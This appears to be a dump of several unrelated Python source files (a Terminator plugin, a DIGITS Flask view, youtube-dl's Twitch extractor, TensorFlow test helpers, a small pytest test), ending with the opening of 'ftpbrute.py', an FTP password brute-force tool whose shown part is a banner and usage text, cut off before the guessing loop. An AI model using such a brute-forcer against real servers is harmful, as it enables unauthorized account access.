if not self.watches.has_key(terminal):
item = gtk.MenuItem(_("Watch for silence"))
item.connect("activate", self.watch, terminal)
else:
item = gtk.MenuItem(_("Stop watching for silence"))
item.connect("activate", self.unwatch, terminal)
menuitems.append(item)
dbg('Menu items appended')
def watch(self, _widget, terminal):
"""Watch a terminal"""
vte = terminal.get_vte()
self.watches[terminal] = vte.connect('contents-changed',
self.reset_timer, terminal)
timeout_id = gobject.timeout_add(5000, self.check_times, terminal)
self.timers[terminal] = timeout_id
dbg('timer %s added for %s' %(timeout_id, terminal))
def unwatch(self, _vte, terminal):
"""Unwatch a terminal"""
vte = terminal.get_vte()
vte.disconnect(self.watches[terminal])
del(self.watches[terminal])
gobject.source_remove(self.timers[terminal])
del(self.timers[terminal])
def reset_timer(self, _vte, terminal):
"""Reset the last-changed time for a terminal"""
time_now = time.mktime(time.gmtime())
self.last_activities[terminal] = time_now
dbg('reset activity time for %s' % terminal)
def check_times(self, terminal):
"""Check if this terminal has gone silent"""
time_now = time.mktime(time.gmtime())
if not self.last_activities.has_key(terminal):
dbg('Terminal %s has no last activity' % terminal)
return True
dbg('seconds since last activity: %f (%s)' % (time_now - self.last_activities[terminal], terminal))
if time_now - self.last_activities[terminal] >= 10.0:
del(self.last_activities[terminal])
note = pynotify.Notification('Terminator', 'Silence in: %s' %
terminal.get_window_title(), 'terminator')
note.show()
return True
| zygh0st/terminator | terminatorlib/plugins/activitywatch.py | Python | gpl-2.0 | 5,529 |
# Copyright (c) 2014-2015, NVIDIA CORPORATION. All rights reserved.
import os.path
from cStringIO import StringIO
import flask
import PIL.Image
import digits
from digits import utils
from digits.webapp import app, autodoc
import classification.views
import extraction.views
NAMESPACE = '/datasets/images'
@app.route(NAMESPACE + '/resize-example', methods=['POST'])
@autodoc('datasets')
def image_dataset_resize_example():
"""
Resizes the example image, and returns it as a string of png data
"""
try:
example_image_path = os.path.join(os.path.dirname(digits.__file__), 'static', 'images', 'mona_lisa.jpg')
image = utils.image.load_image(example_image_path)
width = int(flask.request.form['width'])
height = int(flask.request.form['height'])
channels = int(flask.request.form['channels'])
resize_mode = flask.request.form['resize_mode']
encoding = flask.request.form['encoding']
image = utils.image.resize_image(image, height, width,
channels=channels,
resize_mode=resize_mode,
)
if encoding == 'none':
length = len(image.tostring())
else:
s = StringIO()
if encoding == 'png':
PIL.Image.fromarray(image).save(s, format='PNG')
elif encoding == 'jpg':
PIL.Image.fromarray(image).save(s, format='JPEG', quality=90)
else:
raise ValueError('unrecognized encoding "%s"' % encoding)
s.seek(0)
image = PIL.Image.open(s)
length = len(s.getvalue())
data = utils.image.embed_image_html(image)
return '<img src=\"' + data + '\" style=\"width:%spx;height=%spx\" />\n<br>\n<i>Image size: %s</i>' % (
width,
height,
utils.sizeof_fmt(length)
)
except Exception as e:
return '%s: %s' % (type(e).__name__, e)
| DESHRAJ/DIGITS | digits/dataset/images/views.py | Python | bsd-3-clause | 1,982 |
# coding: utf-8
from __future__ import unicode_literals
import itertools
import re
import random
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urllib_parse,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
parse_iso8601,
)
class TwitchBaseIE(InfoExtractor):
_VALID_URL_BASE = r'https?://(?:www\.)?twitch\.tv'
_API_BASE = 'https://api.twitch.tv'
_USHER_BASE = 'http://usher.twitch.tv'
_LOGIN_URL = 'https://secure.twitch.tv/login'
_LOGIN_POST_URL = 'https://passport.twitch.tv/authorize'
_NETRC_MACHINE = 'twitch'
def _handle_error(self, response):
if not isinstance(response, dict):
return
error = response.get('error')
if error:
raise ExtractorError(
'%s returned error: %s - %s' % (self.IE_NAME, error, response.get('message')),
expected=True)
def _download_json(self, url, video_id, note='Downloading JSON metadata'):
headers = {
'Referer': 'http://api.twitch.tv/crossdomain/receiver.html?v=2',
'X-Requested-With': 'XMLHttpRequest',
}
for cookie in self._downloader.cookiejar:
if cookie.name == 'api_token':
headers['Twitch-Api-Token'] = cookie.value
request = compat_urllib_request.Request(url, headers=headers)
response = super(TwitchBaseIE, self)._download_json(request, video_id, note)
self._handle_error(response)
return response
def _real_initialize(self):
self._login()
def _login(self):
(username, password) = self._get_login_info()
if username is None:
return
login_page = self._download_webpage(
self._LOGIN_URL, None, 'Downloading login page')
login_form = self._hidden_inputs(login_page)
login_form.update({
'login': username.encode('utf-8'),
'password': password.encode('utf-8'),
})
request = compat_urllib_request.Request(
self._LOGIN_POST_URL, compat_urllib_parse.urlencode(login_form).encode('utf-8'))
request.add_header('Referer', self._LOGIN_URL)
response = self._download_webpage(
request, None, 'Logging in as %s' % username)
error_message = self._search_regex(
r'<div[^>]+class="subwindow_notice"[^>]*>([^<]+)</div>',
response, 'error message', default=None)
if error_message:
raise ExtractorError(
'Unable to login. Twitch said: %s' % error_message, expected=True)
if '>Reset your password<' in response:
self.report_warning('Twitch asks you to reset your password, go to https://secure.twitch.tv/reset/submit')
def _prefer_source(self, formats):
try:
source = next(f for f in formats if f['format_id'] == 'Source')
source['preference'] = 10
except StopIteration:
pass # No Source stream present
self._sort_formats(formats)
class TwitchItemBaseIE(TwitchBaseIE):
def _download_info(self, item, item_id):
return self._extract_info(self._download_json(
'%s/kraken/videos/%s%s' % (self._API_BASE, item, item_id), item_id,
'Downloading %s info JSON' % self._ITEM_TYPE))
def _extract_media(self, item_id):
info = self._download_info(self._ITEM_SHORTCUT, item_id)
response = self._download_json(
'%s/api/videos/%s%s' % (self._API_BASE, self._ITEM_SHORTCUT, item_id), item_id,
'Downloading %s playlist JSON' % self._ITEM_TYPE)
entries = []
chunks = response['chunks']
qualities = list(chunks.keys())
for num, fragment in enumerate(zip(*chunks.values()), start=1):
formats = []
for fmt_num, fragment_fmt in enumerate(fragment):
format_id = qualities[fmt_num]
fmt = {
'url': fragment_fmt['url'],
'format_id': format_id,
'quality': 1 if format_id == 'live' else 0,
}
m = re.search(r'^(?P<height>\d+)[Pp]', format_id)
if m:
fmt['height'] = int(m.group('height'))
formats.append(fmt)
self._sort_formats(formats)
entry = dict(info)
entry['id'] = '%s_%d' % (entry['id'], num)
entry['title'] = '%s part %d' % (entry['title'], num)
entry['formats'] = formats
entries.append(entry)
return self.playlist_result(entries, info['id'], info['title'])
def _extract_info(self, info):
return {
'id': info['_id'],
'title': info['title'],
'description': info['description'],
'duration': info['length'],
'thumbnail': info['preview'],
'uploader': info['channel']['display_name'],
'uploader_id': info['channel']['name'],
'timestamp': parse_iso8601(info['recorded_at']),
'view_count': info['views'],
}
def _real_extract(self, url):
return self._extract_media(self._match_id(url))
class TwitchVideoIE(TwitchItemBaseIE):
IE_NAME = 'twitch:video'
_VALID_URL = r'%s/[^/]+/b/(?P<id>\d+)' % TwitchBaseIE._VALID_URL_BASE
_ITEM_TYPE = 'video'
_ITEM_SHORTCUT = 'a'
_TEST = {
'url': 'http://www.twitch.tv/riotgames/b/577357806',
'info_dict': {
'id': 'a577357806',
'title': 'Worlds Semifinals - Star Horn Royal Club vs. OMG',
},
'playlist_mincount': 12,
}
class TwitchChapterIE(TwitchItemBaseIE):
IE_NAME = 'twitch:chapter'
_VALID_URL = r'%s/[^/]+/c/(?P<id>\d+)' % TwitchBaseIE._VALID_URL_BASE
_ITEM_TYPE = 'chapter'
_ITEM_SHORTCUT = 'c'
_TESTS = [{
'url': 'http://www.twitch.tv/acracingleague/c/5285812',
'info_dict': {
'id': 'c5285812',
'title': 'ACRL Off Season - Sports Cars @ Nordschleife',
},
'playlist_mincount': 3,
}, {
'url': 'http://www.twitch.tv/tsm_theoddone/c/2349361',
'only_matching': True,
}]
class TwitchVodIE(TwitchItemBaseIE):
IE_NAME = 'twitch:vod'
_VALID_URL = r'%s/[^/]+/v/(?P<id>\d+)' % TwitchBaseIE._VALID_URL_BASE
_ITEM_TYPE = 'vod'
_ITEM_SHORTCUT = 'v'
_TEST = {
'url': 'http://www.twitch.tv/riotgames/v/6528877',
'info_dict': {
'id': 'v6528877',
'ext': 'mp4',
'title': 'LCK Summer Split - Week 6 Day 1',
'thumbnail': 're:^https?://.*\.jpg$',
'duration': 17208,
'timestamp': 1435131709,
'upload_date': '20150624',
'uploader': 'Riot Games',
'uploader_id': 'riotgames',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
item_id = self._match_id(url)
info = self._download_info(self._ITEM_SHORTCUT, item_id)
access_token = self._download_json(
'%s/api/vods/%s/access_token' % (self._API_BASE, item_id), item_id,
'Downloading %s access token' % self._ITEM_TYPE)
formats = self._extract_m3u8_formats(
'%s/vod/%s?nauth=%s&nauthsig=%s&allow_source=true'
% (self._USHER_BASE, item_id, access_token['token'], access_token['sig']),
item_id, 'mp4')
self._prefer_source(formats)
info['formats'] = formats
return info
class TwitchPlaylistBaseIE(TwitchBaseIE):
_PLAYLIST_URL = '%s/kraken/channels/%%s/videos/?offset=%%d&limit=%%d' % TwitchBaseIE._API_BASE
_PAGE_LIMIT = 100
def _extract_playlist(self, channel_id):
info = self._download_json(
'%s/kraken/channels/%s' % (self._API_BASE, channel_id),
channel_id, 'Downloading channel info JSON')
channel_name = info.get('display_name') or info.get('name')
entries = []
offset = 0
limit = self._PAGE_LIMIT
for counter in itertools.count(1):
response = self._download_json(
self._PLAYLIST_URL % (channel_id, offset, limit),
channel_id, 'Downloading %s videos JSON page %d' % (self._PLAYLIST_TYPE, counter))
page_entries = self._extract_playlist_page(response)
if not page_entries:
break
entries.extend(page_entries)
offset += limit
return self.playlist_result(
[self.url_result(entry) for entry in set(entries)],
channel_id, channel_name)
def _extract_playlist_page(self, response):
videos = response.get('videos')
return [video['url'] for video in videos] if videos else []
def _real_extract(self, url):
return self._extract_playlist(self._match_id(url))
class TwitchProfileIE(TwitchPlaylistBaseIE):
IE_NAME = 'twitch:profile'
_VALID_URL = r'%s/(?P<id>[^/]+)/profile/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_PLAYLIST_TYPE = 'profile'
_TEST = {
'url': 'http://www.twitch.tv/vanillatv/profile',
'info_dict': {
'id': 'vanillatv',
'title': 'VanillaTV',
},
'playlist_mincount': 412,
}
class TwitchPastBroadcastsIE(TwitchPlaylistBaseIE):
IE_NAME = 'twitch:past_broadcasts'
_VALID_URL = r'%s/(?P<id>[^/]+)/profile/past_broadcasts/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_PLAYLIST_URL = TwitchPlaylistBaseIE._PLAYLIST_URL + '&broadcasts=true'
_PLAYLIST_TYPE = 'past broadcasts'
_TEST = {
'url': 'http://www.twitch.tv/spamfish/profile/past_broadcasts',
'info_dict': {
'id': 'spamfish',
'title': 'Spamfish',
},
'playlist_mincount': 54,
}
class TwitchBookmarksIE(TwitchPlaylistBaseIE):
IE_NAME = 'twitch:bookmarks'
_VALID_URL = r'%s/(?P<id>[^/]+)/profile/bookmarks/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_PLAYLIST_URL = '%s/api/bookmark/?user=%%s&offset=%%d&limit=%%d' % TwitchBaseIE._API_BASE
_PLAYLIST_TYPE = 'bookmarks'
_TEST = {
'url': 'http://www.twitch.tv/ognos/profile/bookmarks',
'info_dict': {
'id': 'ognos',
'title': 'Ognos',
},
'playlist_mincount': 3,
}
def _extract_playlist_page(self, response):
entries = []
for bookmark in response.get('bookmarks', []):
video = bookmark.get('video')
if not video:
continue
entries.append(video['url'])
return entries
class TwitchStreamIE(TwitchBaseIE):
IE_NAME = 'twitch:stream'
_VALID_URL = r'%s/(?P<id>[^/#?]+)/?(?:\#.*)?$' % TwitchBaseIE._VALID_URL_BASE
_TESTS = [{
'url': 'http://www.twitch.tv/shroomztv',
'info_dict': {
'id': '12772022048',
'display_id': 'shroomztv',
'ext': 'mp4',
'title': 're:^ShroomzTV [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
'description': 'H1Z1 - lonewolfing with ShroomzTV | A3 Battle Royale later - @ShroomzTV',
'is_live': True,
'timestamp': 1421928037,
'upload_date': '20150122',
'uploader': 'ShroomzTV',
'uploader_id': 'shroomztv',
'view_count': int,
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://www.twitch.tv/miracle_doto#profile-0',
'only_matching': True,
}]
def _real_extract(self, url):
channel_id = self._match_id(url)
stream = self._download_json(
'%s/kraken/streams/%s' % (self._API_BASE, channel_id), channel_id,
'Downloading stream JSON').get('stream')
# Fallback on profile extraction if stream is offline
if not stream:
return self.url_result(
'http://www.twitch.tv/%s/profile' % channel_id,
'TwitchProfile', channel_id)
# Channel name may be typed if different case than the original channel name
# (e.g. http://www.twitch.tv/TWITCHPLAYSPOKEMON) that will lead to constructing
# an invalid m3u8 URL. Working around by use of original channel name from stream
# JSON and fallback to lowercase if it's not available.
channel_id = stream.get('channel', {}).get('name') or channel_id.lower()
access_token = self._download_json(
'%s/api/channels/%s/access_token' % (self._API_BASE, channel_id), channel_id,
'Downloading channel access token')
query = {
'allow_source': 'true',
'p': random.randint(1000000, 10000000),
'player': 'twitchweb',
'segment_preference': '4',
'sig': access_token['sig'].encode('utf-8'),
'token': access_token['token'].encode('utf-8'),
}
formats = self._extract_m3u8_formats(
'%s/api/channel/hls/%s.m3u8?%s'
% (self._USHER_BASE, channel_id, compat_urllib_parse.urlencode(query)),
channel_id, 'mp4')
self._prefer_source(formats)
view_count = stream.get('viewers')
timestamp = parse_iso8601(stream.get('created_at'))
channel = stream['channel']
title = self._live_title(channel.get('display_name') or channel.get('name'))
description = channel.get('status')
thumbnails = []
for thumbnail_key, thumbnail_url in stream['preview'].items():
m = re.search(r'(?P<width>\d+)x(?P<height>\d+)\.jpg$', thumbnail_key)
if not m:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int(m.group('width')),
'height': int(m.group('height')),
})
return {
'id': compat_str(stream['_id']),
'display_id': channel_id,
'title': title,
'description': description,
'thumbnails': thumbnails,
'uploader': channel.get('display_name'),
'uploader_id': channel.get('name'),
'timestamp': timestamp,
'view_count': view_count,
'formats': formats,
'is_live': True,
}
| DucQuang1/youtube-dl | youtube_dl/extractor/twitch.py | Python | unlicense | 14,422 |
from mypkg.power import power
class TestZero:
def test_ten(self):
assert power(0, 10, 1000) == 0
def test_hundred(self):
assert power(0, 100, 1000) == 0
| vogonsoft/pytest-tutorial | test05/test_zero.py | Python | unlicense | 163 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Facilities for creating multiple test combinations.
Here is an example of testing various optimizers in Eager and Graph mode:
class AdditionExample(test.TestCase, parameterized.TestCase):
@combinations.generate(
combinations.combine(mode=["graph", "eager"],
optimizer=[AdamOptimizer(),
GradientDescentOptimizer()]))
def testOptimizer(self, optimizer):
... f(optimizer)...
This will run `testOptimizer` 4 times with the specified optimizers: 2 in
Eager and 2 in Graph mode.
The test will be provided with arguments that match the arguments of combine
by name. It is necessary to request all arguments, except for `mode`, which is
optional.
`combine()` function is available for creating a cross product of various
options. `times()` function exists for creating a product of N `combine()`-ed
results. See below.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import sys
import types
import unittest
from absl.testing import parameterized
import six
from tensorflow.contrib.cluster_resolver import TPUClusterResolver
from tensorflow.contrib.distribute.python import mirrored_strategy as mirrored_lib
from tensorflow.contrib.distribute.python import one_device_strategy as one_device_lib
from tensorflow.contrib.distribute.python import tpu_strategy as tpu_lib
from tensorflow.contrib.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.contrib.optimizer_v2 import adam as adam_v2
from tensorflow.contrib.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.training import adagrad
from tensorflow.python.training import adam
from tensorflow.python.training import distribution_strategy_context
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import rmsprop
from tensorflow.python.util import tf_inspect
GPU_TEST = "test_gpu" in sys.argv[0]
TPU_TEST = "test_tpu" in sys.argv[0]
def generate(combinations):
"""A decorator for generating test cases of a test method or a test class.
Args:
combinations: a list of dictionaries created using combine() and times().
Restrictions:
-- the "mode" argument can be either "eager" or "graph". It's "graph" by
default.
-- arguments of the test method must match by name to get the corresponding
value of the combination. Tests must accept all arguments except the
"mode", "required_tpu" and "required_gpus".
-- "distribution" argument is special and optional. It is meant for passing
instances of DistributionStrategy. Each instance is to be passed as via
`NamedDistribution`. If using "distribution", "required_gpus" and
"required_tpu" should be specified via the NamedDistribution instance,
rather than as separate arguments.
-- "required_tpu" argument is special and optional. If not `None`, then the
test will be skipped if TPUs aren't available.
-- "required_gpus" argument is special and optional. If not `None`, then the
test will be skipped if the specified number of GPUs aren't available.
Returns:
a decorator that will cause the test method or the test class to be run
under the specified conditions.
Raises:
ValueError - if "mode" argument wasn't either "eager" or "graph" or if other
arguments were not accepted by the test method.
"""
def decorator(test_method_or_class):
"""The decorator to be returned."""
# Generate good test names that can be used with --test_filter.
named_combinations = []
for combination in combinations:
# We use OrderedDicts in `combine()` and `times()` to ensure stable
# order of keys in each dictionary.
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format(
"".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
if isinstance(test_method_or_class, type):
class_object = test_method_or_class
class_object._test_method_ids = test_method_ids = {}
for name, test_method in six.iteritems(class_object.__dict__.copy()):
if (name.startswith(unittest.TestLoader.testMethodPrefix) and
isinstance(test_method, types.FunctionType)):
delattr(class_object, name)
methods = {}
parameterized._update_class_dict_for_param_test_case(
class_object.__name__, methods, test_method_ids, name,
parameterized._ParameterizedTestIter(
_augment_with_special_arguments(test_method),
named_combinations, parameterized._NAMED, name))
for method_name, method in six.iteritems(methods):
setattr(class_object, method_name, method)
return class_object
else:
test_method = _augment_with_special_arguments(test_method_or_class)
return parameterized.named_parameters(*named_combinations)(test_method)
return decorator
def _augment_with_special_arguments(test_method):
def decorated(self, **kwargs):
"""A wrapped test method that treats some arguments in a special way."""
mode = kwargs.pop("mode", "graph")
distribution = kwargs.get("distribution", None)
required_tpu = kwargs.pop("required_tpu", False)
required_gpus = kwargs.pop("required_gpus", None)
if distribution:
assert required_gpus is None, (
"Do not use `required_gpus` and `distribution` together.")
assert required_tpu is False, (
"Do not use `required_tpu` and `distribution` together.")
required_gpus = distribution.required_gpus
required_tpu = distribution.required_tpu
if required_tpu and not TPU_TEST:
self.skipTest("Test requires a TPU, but it's not available.")
if not required_tpu and TPU_TEST:
self.skipTest("Test that doesn't require a TPU.")
if not required_gpus:
if GPU_TEST:
self.skipTest("Test that doesn't require GPUs.")
elif context.num_gpus() < required_gpus:
self.skipTest(
"{} GPUs are not available for this test. {} GPUs are available".
format(required_gpus, context.num_gpus()))
# At this point, `kwargs` doesn't have `required_gpus` or `required_tpu`
# that the user might have specified. `kwargs` still has `mode`, which
# the test is allowed to accept or ignore.
requested_arguments = tf_inspect.getfullargspec(test_method).args
missing_arguments = set(list(kwargs.keys()) + ["self"]).difference(
set(requested_arguments + ["mode"]))
if missing_arguments:
raise ValueError("The test is missing arguments {} .".format(
missing_arguments))
kwargs_to_pass = {}
for arg in requested_arguments:
if arg == "self":
kwargs_to_pass[arg] = self
else:
kwargs_to_pass[arg] = kwargs[arg]
if mode == "eager":
with ops.Graph().as_default(), context.eager_mode():
if distribution:
kwargs_to_pass["distribution"] = distribution.strategy
test_method(**kwargs_to_pass)
elif mode == "graph":
with ops.Graph().as_default(), context.graph_mode():
if distribution:
kwargs_to_pass["distribution"] = distribution.strategy
test_method(**kwargs_to_pass)
else:
raise ValueError(
"'mode' has to be either 'eager' or 'graph' and not {}".format(
mode))
return decorated
def combine(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = combine(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
return [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
def times(*combined):
"""Generate a product of N sets of combinations.
times(combine(a=[1,2]), combine(b=[3,4])) == combine(a=[1,2], b=[3,4])
Args:
*combined: N lists of dictionaries that specify combinations.
Returns:
a list of dictionaries for each combination.
Raises:
ValueError: if some of the inputs have overlapping keys.
"""
assert combined
if len(combined) == 1:
return combined[0]
first = combined[0]
rest_combined = times(*combined[1:])
combined_results = []
for a in first:
for b in rest_combined:
if set(a.keys()).intersection(set(b.keys())):
raise ValueError("Keys need to not overlap: {} vs {}".format(
a.keys(), b.keys()))
combined_results.append(OrderedDict(list(a.items()) + list(b.items())))
return combined_results
class NamedObject(object):
"""A class that translates an object into a good test name."""
def __init__(self, name, obj):
self._name = name
self._obj = obj
def __getattr__(self, name):
return getattr(self._obj, name)
def __call__(self, *args, **kwargs):
return self._obj(*args, **kwargs)
def __repr__(self):
return self._name
class NamedDistribution(object):
"""Translates DistributionStrategy and its data into a good name."""
def __init__(self, name, distribution_fn, required_gpus=None,
required_tpu=False):
self._distribution_fn = distribution_fn
self._name = name
self._required_gpus = required_gpus
self._required_tpu = required_tpu
def __repr__(self):
return self._name
@property
def strategy(self):
return self._distribution_fn()
@property
def required_gpus(self):
return self._required_gpus
@property
def required_tpu(self):
return self._required_tpu
# pylint: disable=g-long-lambda
default_strategy = NamedDistribution(
"Default",
distribution_strategy_context._get_default_distribution_strategy, # pylint: disable=protected-access
required_gpus=None)
one_device_strategy = NamedDistribution(
"OneDeviceCPU", lambda: one_device_lib.OneDeviceStrategy("/cpu:0"),
required_gpus=None)
tpu_strategy = NamedDistribution(
"TPU", lambda: tpu_lib.TPUStrategy(
TPUClusterResolver(""), steps_per_run=2),
required_tpu=True)
tpu_strategy_one_step = NamedDistribution(
"TPUOneStep", lambda: tpu_lib.TPUStrategy(
TPUClusterResolver(""), steps_per_run=1),
required_tpu=True)
mirrored_strategy_with_gpu_and_cpu = NamedDistribution(
"MirroredCPUAndGPU",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/cpu:0"]),
required_gpus=1)
mirrored_strategy_with_two_gpus = NamedDistribution(
"Mirrored2GPUs",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/gpu:1"]),
required_gpus=2)
core_mirrored_strategy_with_gpu_and_cpu = NamedDistribution(
"CoreMirroredCPUAndGPU",
lambda: mirrored_lib.CoreMirroredStrategy(["/gpu:0", "/cpu:0"]),
required_gpus=1)
core_mirrored_strategy_with_two_gpus = NamedDistribution(
"CoreMirrored2GPUs",
lambda: mirrored_lib.CoreMirroredStrategy(["/gpu:0", "/gpu:1"]),
required_gpus=2)
gradient_descent_optimizer_v1_fn = NamedObject(
"GradientDescentV1", lambda: gradient_descent.GradientDescentOptimizer(0.2))
adagrad_optimizer_v1_fn = NamedObject(
"AdagradV1", lambda: adagrad.AdagradOptimizer(0.001))
adam_optimizer_v1_fn = NamedObject("AdamV1",
lambda: adam.AdamOptimizer(0.001, epsilon=1))
rmsprop_optimizer_v1_fn = NamedObject(
"RmsPropV1", lambda: rmsprop.RMSPropOptimizer(0.001))
optimizers_v1 = [gradient_descent_optimizer_v1_fn, adagrad_optimizer_v1_fn]
gradient_descent_optimizer_v2_fn = NamedObject(
"GradientDescentV2",
lambda: gradient_descent_v2.GradientDescentOptimizer(0.2))
adagrad_optimizer_v2_fn = NamedObject(
"AdagradV2", lambda: adagrad_v2.AdagradOptimizer(0.001))
adam_optimizer_v2_fn = NamedObject(
"AdamV2", lambda: adam_v2.AdamOptimizer(0.001, epsilon=1))
optimizers_v2 = [gradient_descent_optimizer_v2_fn, adagrad_optimizer_v2_fn]
graph_and_eager_modes = ["graph", "eager"]
def distributions_and_v1_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
core_mirrored_strategy_with_gpu_and_cpu,
core_mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v1)
def distributions_and_v2_optimizers():
"""DistributionStrategies and V2 Optimizers."""
return combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
core_mirrored_strategy_with_gpu_and_cpu,
core_mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v2)
| brchiu/tensorflow | tensorflow/contrib/distribute/python/combinations.py | Python | apache-2.0 | 14,495 |
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# This is ftp brute force tools .
# This was written for educational purpose and pentest only. Use it at your own risk.
# Suggestion ! don't use very large wordlist, because system need to read it first for a while and do it @ brute time... "that's cause LOSS" maybe you can use time.sleep(int)
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : [email protected]
# TOOL NAME : ftpbrute.py v1.0
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk
import sys
import time
import os
from ftplib import FTP
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
log = "ftpbrute.log"
file = open(log, "a")
def MyFace() :
os.system(SysCls)
print "\n .___ .__ .__ _______ .___ "
print " __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ "
print " / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / "
print " / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / "
print " \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ "
print " \/ \/ \/ \/ \/ \/ \/ \/ \/ "
print " http://www.devilzc0de.com "
print " by : gunslinger_ "
print " ftpbrute.py version 1.0 "
print " Brute forcing ftp target "
print " Programmmer : gunslinger_ "
print " gunslinger[at]devilzc0de[dot]com "
print "_______________________________________________________________________________________________________________________________________\n"
file.write("\n .___ .__ .__ _______ .___ ")
file.write("\n __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ ")
file.write("\n / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / ")
file.write("\n / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / ")
file.write("\n \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ ")
file.write("\n \/ \/ \/ \/ \/ \/ \/ \/ \/ ")
file.write("\n http://www.devilzc0de.com ")
file.write("\n by : gunslinger_ ")
file.write("\n ftpbrute.py version 1.0 ")
file.write("\n Brute forcing ftp target ")
file.write("\n Programmmer : gunslinger_ ")
file.write("\n gunslinger[at]devilzc0de[dot]com ")
file.write("\n_______________________________________________________________________________________________________________________________________\n")
def HelpMe() :
MyFace()
print 'Usage: ./ftpbrute.py [options]\n'
print 'Options: -t, --target <hostname/ip> | Target to bruteforcing '
print ' -u, --user <user> | User for bruteforcing'
print ' -w, --wordlist <filename> | Wordlist used for bruteforcing'
print ' -h, --help <help> | print this help'
print ' \n'
print 'Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n'
file.write( '\nUsage: ./ftpbrute.py [options]')
file.write( '\nOptions: -t, --target <hostname/ip> | Target to bruteforcing ')
file.write( '\n -u, --user <user> | User for bruteforcing')
file.write( '\n -w, --wordlist <filename> | Wordlist used for bruteforcing')
file.write( '\n -h, --help <help> | print this help')
file.write( '\n maybe you can use time.sleep(int) \n')
file.write( '\nExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n')
sys.exit(1)
for arg in sys.argv:
